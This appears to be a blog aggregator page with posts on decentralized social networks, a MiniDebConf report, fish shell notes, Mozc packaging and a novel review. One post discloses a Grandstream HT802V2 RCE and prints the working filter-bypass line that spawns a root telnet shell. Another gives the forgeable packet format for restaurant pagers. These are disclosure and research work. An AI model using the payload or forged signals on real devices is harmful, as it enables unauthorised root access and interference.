Will any of these replace X/Twitter? As usage patterns vary, the statistics are not fully comparable, but this overview of the situation in March 2025 gives a decent overview.
Platform Total Accounts Active Users Growth Trend
Mastodon ~10 million ~1 million Steady
Bluesky ~33 million ~1 million Steady
Nostr ~41 million ~20 thousand Steady
Farcaster ~850 thousand ~50 thousand Flat
Lens ~140 thousand ~20 thousand Flat
Mastodon and Bluesky have already reached millions of users, while Lens and Farcaster are growing within crypto communities. It is however clear that none of these are anywhere close to how popular X/Twitter is. In particular, Mastodon had a huge influx of users in the fall of 2022 when Twitter was acquired, but to challenge the incumbents the growth would need to significantly accelerate. We can all accelerate this development by embracing decentralized social media now alongside existing dominant platforms. Who knows, given the right circumstances maybe X.com leadership decides to change the operating model and start federating contents to break out from a walled garden model. The likelyhood of such development would increase if decentralized networks get popular, and the encumbents feel they need to participate to not lose out.

Past and future The idea of decentralized social media is not new. One early pioneer identi.ca launched in 2008, only two years after Twitter, using the OStatus protocol to promote decentralization. A few years later it evolved into pump.io with the ActivityPump protocol, and also forked into GNU Social that continued with OStatus. I remember when these happened, and that in 2010 also Diaspora launched with fairly large publicity. Surprisingly both of these still operate (I can still post both on identi.ca and diasp.org), but the activity fizzled out years ago. The protocol however survived partially and evolved into ActivityPub, which is now the backbone of the Fediverse. The evolution of decentralized social media over the next decade will likely parallel developments in democracy, freedom of speech and public discourse. While the early 2010s emphasized maximum independence and freedom, the late 2010s saw growing support for content moderation to combat misinformation. The AI era introduces new challenges, potentially requiring proof-of-humanity verification for content authenticity. Key factors that will determine success:
  • User experience and ease of onboarding
  • Network effects and critical mass of users
  • Integration with existing web3 infrastructure
  • Balance between decentralization and usability
  • Sustainable economic models for infrastructure
This is clearly an area of development worth monitoring closely, as the next few years may determine which protocol becomes the de facto standard for decentralized social communication.

4 March 2025

Paul Tagliamonte: Reverse Engineering (another) Restaurant Pager system

Some of you may remember that I recently felt a bit underwhelmed by the last pager I reverse engineered the Retekess TD-158, mostly due to how intuitive their design decions were. It was pretty easy to jump to conclusions because they had made some pretty good decisions on how to do things. I figured I d spin the wheel again and try a new pager system this time I went for a SU-68G-10 pager, since I recognized the form factor as another fairly common unit I ve seen around town. Off to Amazon I went, bought a set, and got to work trying to track down the FCC filings on this model. I eventually found what seemed to be the right make/model, and it, once again, indicated that this system should be operating in the 433 MHz ISM band likely using OOK modulation. So, figured I d start with the center of the band (again) at 433.92 MHz, take a capture, test my luck, and was greeted with a now very familiar sight. Same as the last goarounds, except the premable here is a 0 symbol followed by 6-ish symbol durations of no data, followed by 25 bits of a packet. Careful readers will observe 26 symbols above after the preamble I did too! The last 0 in the screenshot above is not actually a part of the packet rather, it s part of the next packet s preamble. Each packet is packed in pretty tight.

By Hand Demodulation Going off the same premise as last time, I figured i d give it a manual demod and see what shakes out (again). This is now the third time i ve run this play, so check out either of my prior two posts for a better written description of what s going on here I ll skip all the details since i d just be copy-pasting from those posts into here. Long story short, I demodulated a call for pager 1, call for pager 10, and a power off command.
What Bits
Call 1 1101111111100100100000000
Call 101101111111100100010100000
Off 1101111111100111101101110
A few things jump out at me here the first 14 bits are fixed (in my case, 11011111111001), which means some mix of preamble, system id, or other system-wide constant. Additionally, The last 9 bits also look like they are our pager the 1 and 10 pager numbers (LSB bit order) jump right out (100000000 and 010100000, respectively). That just leaves the two remaining bits which look to be the action 00 for a Call , and 11 for a Power off . I don t super love this since command has two bits rather than one, the base station ID seems really long, and a 9-bit Pager ID is just weird. Also, what is up with that power-off pager id? Weird. So, let s go and see what we can do to narrow down and confirm things by hand.

Testing bit flips Rather than call it a day at that, I figure it s worth a bit of diligence to make sure it s all correct so I figured we should try sending packets to my pagers and see how they react to different messages after flipping bits in parts of the packet. I implemented a simple base station for the pagers using my Ettus B210mini, and threw together a simple OOK modulator and transmitter program which allows me to send specifically crafted test packets on frequency. Implementing the base station is pretty straightforward, because of the modulation of the signal (OOK), it s mostly a matter of setting a buffer to 1 and 0 for where the carrier signal is on or off timed to the sample rate, and sending that off to the radio. If you re interested in a more detailed writeup on the steps involved, there s a bit more in my christmas tree post. First off, I d like to check the base id. I want to know if all the bits in what I m calling the base id are truly part of the base station ID, or perhaps they have some other purpose (version, preamble?). I wound up following a three-step process for every base station id:
  • Starting with an unmodified call packet for the pager under test:
    • Flip the Nth bit, and transmit the call. See if the pager reacts.
    • Hold SET , and pair the pager with the new packet.
    • Transmit the call. See if the pager reacts.
    • After re-setting the ID, transmit the call with the physical base station, see if the pager reacts.
  • Starting with an unmodified off packet for the pager system
  • Flip the Nth bit, transmit the off, see if the pager reacts.
What wound up happening is that changing any bit in the first 14 bits meant that the packet no longer worked with any pager until it was re-paired, at which point it begun to work again. This likely means the first 14 bits are part of the base station ID and not static between base stations, or some constant like a version or something. All bits appear to be used. I repeated the same process with the command bits, and found that only 11 and 00 caused the pagers to react for the pager ids i ve tried. I repeated this process one last time with the pager id bits this time, and found the last bit in the packet isn t part of the pager ID, and can be either a 1 or a 0 and still cause the pager to react as if it were a 0. This means that the last bit is unknown but it has no impact on either a power off or call, and all messages sent by my base station always have a 0 set. It s not clear if this is used by anything likely not since setting a bit there doesn t result in any change of behavior I can see yet.

Final Packet Structure After playing around with flipping bits and testing, the final structure I was able to come up with based on behavior I was able to observe from transmitting hand-crafted packets and watching pagers buzz:
base id
command
pager id
???

Commands The command section bit comes in two flavors either a call or an off command.
Type Id (2 bits) Description
Call00Call the pager identified by the id in pager id
Off11Request pagers power off, pager id is always 10110111
As for the actual RF PHY characteristics, here s my best guesses at what s going on with them:
What Description
Center Frequency 433.92 MHz
Modulation OOK
Symbol Duration 1300us
Bits 25
Preamble 325us of carrier, followed by 8800us of no carrier
I m not 100% on the timings, but they appear to be close enough to work reliabily. Same with the center frequency, it s roughly right but there may be a slight difference i m missing.

Lingering Questions This was all generally pretty understandable another system that had some good decisions, and wasn t too bad to reverse engineer. This was a bit more fun to do, since there was a bit more ambiguity here, but still not crazy. At least this one was a bit more ambiguous that needed a bit of followup to confirm things, which made it a bit more fun. I am left with a few questions, though which I m kinda interested in understanding, but I ll likely need a lot more data and/or original source: Why is the command two bits here? This was a bit tough to understand because of the number of bits they have at their disposal given the one last bit at the end of the packet that doesn t seem to do anything, there s no reason this couldn t have been a 16 bit base station id, and an 8 bit pager id along with a single bit command (call or off). When sending an off why is power off that bit pattern? Other pager IDs don t seem to work with off , so it has some meaning, but I m not sure what that is. You press and hold 9 on the physical base station, but the code winds up coming out to 0xED, 237 or maybe -19 if it s signed. I can t quite figure out why it s this value. Are there other codes? Finally what s up with the last bit? Why is it 25 bits and not 24? It must take more work to process something that isn t 8 bit aligned and all for something that s not being used!

1 March 2025

Debian Brasil: MiniDebConf Belo Horizonte 2024 - a brief report


title: MiniDebConf Belo Horizonte 2024 - a brief report description: by Paulo Henrique de Lima Santana (phls) published: true date: 2025-03-01T17:40:50.904Z tags: blog, english editor: markdown dateCreated: 2024-06-06T09:00:00.000Z From April 27th to 30th, 2024, MiniDebConf Belo Horizonte 2024 was held at the Pampulha Campus of UFMG - Federal University of Minas Gerais, in Belo Horizonte city. MiniDebConf BH 2024 banners This was the fifth time that a MiniDebConf (as an exclusive in-person event about Debian) took place in Brazil. Previous editions were in Curitiba (2016, 2017, and 2018), and in Bras lia 2023. We had other MiniDebConfs editions held within Free Software events such as FISL and Latinoware, and other online events. See our event history. Parallel to MiniDebConf, on 27th (Saturday) FLISOL - Latin American Free Software Installation Festival took place. It's the largest event in Latin America to promote Free Software, and It has been held since 2005 simultaneously in several cities. MiniDebConf Belo Horizonte 2024 was a success (as were previous editions) thanks to the participation of everyone, regardless of their level of knowledge about Debian. We value the presence of both beginner users who are familiarizing themselves with the system and the official project developers. The spirit of welcome and collaboration was present during all the event. MiniDebConf BH 2024 flisol 2024 edition numbers During the four days of the event, several activities took place for all levels of users and collaborators of the Debian project. The official schedule was composed of: MiniDebConf BH 2024 palestra The final numbers for MiniDebConf Belo Horizonte 2024 show that we had a record number of participants. Of the 224 participants, 15 were official Brazilian contributors, 10 being DDs (Debian Developers) and 05 (Debian Maintainers), in addition to several unofficial contributors. The organization was carried out by 14 people who started working at the end of 2023, including Prof. Lo c Cerf from the Computing Department who made the event possible at UFMG, and 37 volunteers who helped during the event. As MiniDebConf was held at UFMG facilities, we had the help of more than 10 University employees. See the list with the names of people who helped in some way in organizing MiniDebConf Belo Horizonte 2024. The difference between the number of people registered and the number of attendees in the event is probably explained by the fact that there is no registration fee, so if the person decides not to go to the event, they will not suffer financial losses. The 2024 edition of MiniDebconf Belo Horizonte was truly grand and shows the result of the constant efforts made over the last few years to attract more contributors to the Debian community in Brazil. With each edition the numbers only increase, with more attendees, more activities, more rooms, and more sponsors/supporters. MiniDebConf BH 2024 grupo

MiniDebConf BH 2024 grupo Activities The MiniDebConf schedule was intense and diverse. On the 27th, 29th and 30th (Saturday, Monday and Tuesday) we had talks, discussions, workshops and many practical activities. MiniDebConf BH 2024 palestra On the 28th (Sunday), the Day Trip took place, a day dedicated to sightseeing around the city. In the morning we left the hotel and went, on a chartered bus, to the Belo Horizonte Central Market. People took the opportunity to buy various things such as cheeses, sweets, cacha as and souvenirs, as well as tasting some local foods. MiniDebConf BH 2024 mercado After a 2-hour tour of the Market, we got back on the bus and hit the road for lunch at a typical Minas Gerais food restaurant. MiniDebConf BH 2024 palestra With everyone well fed, we returned to Belo Horizonte to visit the city's main tourist attraction: Lagoa da Pampulha and Capela S o Francisco de Assis, better known as Igrejinha da Pampulha. MiniDebConf BH 2024 palestra We went back to the hotel and the day ended in the hacker space that we set up in the events room for people to chat, packaging, and eat pizzas. MiniDebConf BH 2024 palestra Crowdfunding For the third time we ran a crowdfunding campaign and it was incredible how people contributed! The initial goal was to raise the amount equivalent to a gold tier of R$ 3,000.00. When we reached this goal, we defined a new one, equivalent to one gold tier + one silver tier (R$ 5,000.00). And again we achieved this goal. So we proposed as a final goal the value of a gold + silver + bronze tiers, which would be equivalent to R$ 6,000.00. The result was that we raised R$7,239.65 (~ USD 1,400) with the help of more than 100 people! Thank you very much to the people who contributed any amount. As a thank you, we list the names of the people who donated. MiniDebConf BH 2024 doadores Food, accommodation and/or travel grants for participants Each edition of MiniDebConf brought some innovation, or some different benefit for the attendees. In this year's edition in Belo Horizonte, as with DebConfs, we offered bursaries for food, accommodation and/or travel to help those people who would like to come to the event but who would need some kind of help. In the registration form, we included the option for the person to request a food, accommodation and/or travel bursary, but to do so, they would have to identify themselves as a contributor (official or unofficial) to Debian and write a justification for the request. Number of people benefited: The food bursary provided lunch and dinner every day. The lunches included attendees who live in Belo Horizonte and the region. Dinners were paid for attendees who also received accommodation and/or travel. The accommodation was held at the BH Jaragu Hotel. And the travels included airplane or bus tickets, or fuel (for those who came by car or motorbike). Much of the money to fund the bursaries came from the Debian Project, mainly for travels. We sent a budget request to the former Debian leader Jonathan Carter, and He promptly approved our request. In addition to this event budget, the leader also approved individual requests sent by some DDs who preferred to request directly from him. The experience of offering the bursaries was really good because it allowed several people to come from other cities. MiniDebConf BH 2024 grupo Photos and videos You can watch recordings of the talks at the links below: Thanks We would like to thank all the attendees, organizers, volunteers, sponsors and supporters who contributed to the success of MiniDebConf Belo Horizonte 2024. MiniDebConf BH 2024 grupo Sponsors Gold: Silver: Bronze: Organizers

28 February 2025

Antoine Beaupr : testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer that you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millenia). My normal shell is bash(1), and it's still the shell I used everywhere else than my laptop, as I haven't switched on all the servers I managed, although it is available since August 2022 on torproject.org servers. I first got interested in fish because they ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 year of work with Fish 4.0.

Cool things Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland Autocompletion rocks. Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. Made me realized that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell. By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd, dirh shows the history.

Less cool I feel there's visible latency in the prompt creation. POSIX-style functions (foo() true ) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions). EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful. Process substitution is split on newlines, not whitespace. you need to pipe through string split -n " " to get the equivalent. <(cmd) doesn't exist: they claim you can use cmd foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'. Documentation is... limited. It seems mostly geared the web docs which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!) Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue. I have already filed it upstream in foot and it is apparently fixed already. Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025, it will send the string 202[345] to the command.

Blockers () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py )   sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end   sort -ub
It... works, but it goes back to "oh dear, now there's a new langage again". I only found out about this construct while trying:
  git grep -l '^#!/.*bin/python' ; fdfind .py     sort -u 
... which fails and suggests using begin/end, at which point: why not just support the curly braces? FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from standard. Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges. alt . doesn't always work the way i expect.

23 February 2025

Kentaro Hayashi: Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction This is just a note-taking about how to upgrading Mozc package for up-coming trixie ready (with many restrictions) last year. Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped for Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2 In May 2024, I've found that Mozc was removed from testing, and still in FTBFS. #1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: absl::debian5::flags_internal::ArgvListAction has not been declared - Debian Bug report logs That FTBFS was fixed in the Mozc upstream, but not applied for a while. Not only upstream patch, but also additional linkage patch was required to fix it. Mozc is the de-fact standard input method editor for Japanese. Most of Japanese uses it by default on linux desktop. (Even though frontend input method framework is different, the background engine is Mozc in most cases - uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian) There is a case that Mozc was re-built locally with integrated external dictionary to improve quantity of vocabulary. If FTBFS keep ongoing, it means that it blocks such a usage. So I've sent patches to fix it and they were merged.

Motivation to update Mozc With fixing #1068186, I've also found Mozc version is not synced to upstream for a long time. At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream already released 2.30.5544.102. It seems that Mozc's maintainer was too busy and can't afford to update it, so I've tried to do it.

The blockers for updating Mozc But, it was not so easy task to do so. If you want to package latest Mozc, there were many blockers.
  • Newer Mozc requires Bazel to build, but there is no Bazel package to fit it (There is bazel-bootstrap 4.x, but it's old. v6.x or newer one is required.)
  • Newer abseil and protobuf were required
  • Renderer was changed to Qt. GTK renderer was removed
  • Revise existing patchsets (e.g. for UIM, for Fcitx)
It was not all.

Road to latest Mozc First, I knew the existence of debian-bazel, so I've posted about bazel-packaging progress. Any updates about bazel packaging effort? Sadly there was no response from it. Thus, it was not realistic to adopt Bazel as build tool chain. In other words, we need to keep GYP patch and maintain it. And as another topic, upstream changed renderer from GTK+ to Qt. Here are the major topics about each release of Mozc.
  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version that gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg Debian sid
The internal renderer change are too big, and before GYP deprecation in 2.29.5544.102, GYP support was already removed gradually. As a result, target to 2.29.5160.102 was the practical approach to make it forward.

Revisit existing patchsets for 2.28.4715.102+dfsg Second, need to revisit existing patchset to triage them.
  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.
UIM patch was maintained in third-party repository, and directory structure was quite different from Mozc. It seems that maintenance activity was too low, so it was not enough that picking changes from macuim. It was required to fix FTBFS additionally. Fcitx patch was also maintained in fcitx/mozc. But it tracks only master branch, so it was hard to pick patchset for specific version of Mozc. Finally, I could manage to refresh patchset for 2.29.5160.102.
  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task Mozc need to be repacked, but it didn't use Files-Excluded yet. So I've introduced d/watch to repack upstream source. It makes source package more reproducible.

OT: Hardware breakage There was another blocker to do this task. I've hit the situation that g++ cause SEGV during building Mozc randomly. First, I wonder why it fails, but digging further more, finally I've found that memory module was corrupted. Thus I've lost 32GB memory modules. :-<

Unexpected behaviour in uim-mozc When uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I've found that there is a case that uim-mozc behaves weird. The candidate words were shown with flickering. But it was not regression in this upload. uim-mozc with Wayland cause that problem. Thus GNOME and derivatives might not be affected because ibus-mozc will be used.

Mozc 2.29.5160.102+dfsg-1 As the patchset was matured, then uploaded 2.29.5160.102+dfsg-1 with --delayed 15 option.
$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes
Mozc 2.29.5160.102+dfsg-1 was landed to unstable at 2024-12-20.

Additional bug fixes Additionally, the following bugs were also fixed. These bugs were fixed in 2.29.5160.102+dfsg-1.1 And more, I've found that even though missing pristine-tar branch commit, salsa CI succeeds. I've sent MR for this issue and already merged into.

Mozc and future in Debian In this short journey, I gave up to updating more newer Mozc because the version of dependency libraries were not updated. Note that protobuf 3.25.4 on experimental depends on older absl 20230802, so it must be rebuilt against absl 20240722.0. And more, we need to consider how to migrate from GTK renderer to Qt renderer in the future.

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

10 February 2025

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
